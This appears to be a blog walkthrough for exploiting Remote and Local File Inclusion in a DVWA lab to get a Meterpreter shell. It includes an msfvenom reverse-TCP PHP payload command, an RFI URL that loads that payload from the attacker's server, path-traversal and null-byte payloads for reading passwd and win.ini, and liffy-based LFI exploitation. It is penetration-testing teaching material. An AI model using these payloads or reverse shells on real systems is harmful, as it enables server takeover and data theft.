File Inclusion to Meterpreter

What is File Inclusion vulnerability?

File inclusion vulnerability is a type of vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic Directory Traversal Attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file include vulnerability will result in remote code execution on the web server that runs the affected web application.

Types: 

Remote File Inclusion

Remote File Inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

Local File Inclusion

Local File Inclusion (LFI) is similar to Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data such as the web server’s access logs.

Attacker System:

OS: Backbox 4.7

IP: 192.168.0.104

Tools: Metasploit, msfvenom, tamper data, apache and php

Victim System:

OS: Win XP SP2

IP: 192.168.0.100

Tools: XAMPP, Damn Vulnerable Web Application (DVWA) [Security Level – low]

 

Exploitation of Remote File Inclusion (RFI)

Goal: By using RFI we need to inject Meterpreter within the web server.

Vulnerability Checking:

Since RFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters. Consider the following PHP example: 

$incfile = $_REQUEST[“file”];

include($incfile.”.php”);

In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a white list), so this snippet of code results vulnerable to this type of attack. Consider in fact the following URL:

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page

In this case the remote file is going to be included and any code contained in it is going to be run by the server.

 

In our example, let’s check the vulnerable point.

dvwa

To test the RFI, I just changed the file include.php to https://www.google.com . If the given site pops up within the page then it’s an indication of RFI.

rfi_test

By seeing the response, It is confirmed that the web application has Remote File Inclusion vulnerability in it.

 

Exploitation Scenario:

As we found

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page

here

“vulnerable_host/vuln_page.php?file=” is  our “192.168.0.100/dvwa/vulnerabilities/fi/?page=”

We need only our own web server from where a malicious page will be called. We can use free web hosting site or else our own server. I created my own web server by apache. By default apache comes with Backbox 4.7

screenshot-saturday-04-march-2017-022353-ist

After starting apache server we need to create and paste malicious php file within our server. Then our file location will be: http://192.168.0.104/malicious.php

So now to exploit RFI we have to browse:

http://192.168.0.100/dvwa/vulnerabilities/fi/?page=http://192.168.0.104/malicious.php

Step:

  1. Lets make a malicious php file with msfvenom by using following command:

msfvenom –p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 –f raw >> malicious.php

mal_php_gen

malicious.php is in root now.

mal_php_location

  1. We have to put this file in our own web server. For my use and demonstration apache has been used and its folder is /var/www/html

To access the file over http we need to put malicious.php in this directory.

mal_php_finallocation

  1. Now its time to set listener in Metasploit. So that connection from malicious.php can be received by the listener and successful session will be created.

listener_rfi

  1. We are all set now. We just need to access this file in following manner in attacker’s browser.

http://192.168.0.100/dvwa/vulnerabilities/fi/?page=http://192.168.0.104/malicious.php

 rfi_pwned

Whenever this url has been hit, a remote session will be created in meterpreter as the image shows.

 

Exploitation of Local File Inclusion (LFI)

Goal: By using LFI we need to establish meterpreter connection with the web server.

Vulnerability Checking:

Since LFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters.

Consider the following example:

http://vulnerable_host/preview.php?file=example.html

This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:

http://vulnerable_host/preview.php?file=../../../../etc/passwd  [Linux Example]

http://vulnerable_host/preview.php?file=..\..\..\..\windows\win.ini [Windows Example]

If the above mentioned conditions are met, an attacker would see something like the following:

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

alex:x:500:500:alex:/home/alex:/bin/bash

margo:x:501:501::/home/margo:/bin/bash

Very often, even when such vulnerability exists, its exploitation is a bit more complex. Consider the following piece of code:

<?php “include/”.include($_GET[‘filename’].“.php”); ?>

In the case, simple substitution with arbitrary filename would not work as the postfix ‘php’ is appended. In order to bypass it, a technique with null-byte terminators is used. Since %00 effectively presents the end of the string, any characters after this special byte will be ignored. Thus, the following request will also return an attacker list of basic users attributes:

 http://vulnerable_host/preview.php?file=../../../../etc/passwd%00

Now let’s check our target for LFI.

lfi_test

We can read the content of win.ini file at the top of the web page. That indicates LFI.

Step:

  1. Check the cookies. I use tamper data for this.

cookie

  1. Lets take a look of liffy.py

liffy_help

  1. Use liffy to exploit LFI.

screenshot-saturday-04-march-2017-125442-ist

At the end it will ask you to open Metasploit listener manually.

liffy_last

  1. Let’s create Metasploit listener.

listener_rfi

  1. After setting listener we have to press “ {ENTER} “ in the liffy terminal.

lfi_pwned

  1. After that a successful meterpreter session will be created.

 

References:

  1. https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion
  2. https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
  3. https://github.com/hvqzao/liffy
  4. https://github.com/rapid7/metasploit-framework
  5. https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
  6. https://addons.mozilla.org/En-us/firefox/addon/tamper-data/
  7. https://httpd.apache.org/download.cgi
  8. https://backbox.org/
  9. http://www.dvwa.co.uk/
  10. https://www.apachefriends.org/download.html
Advertisements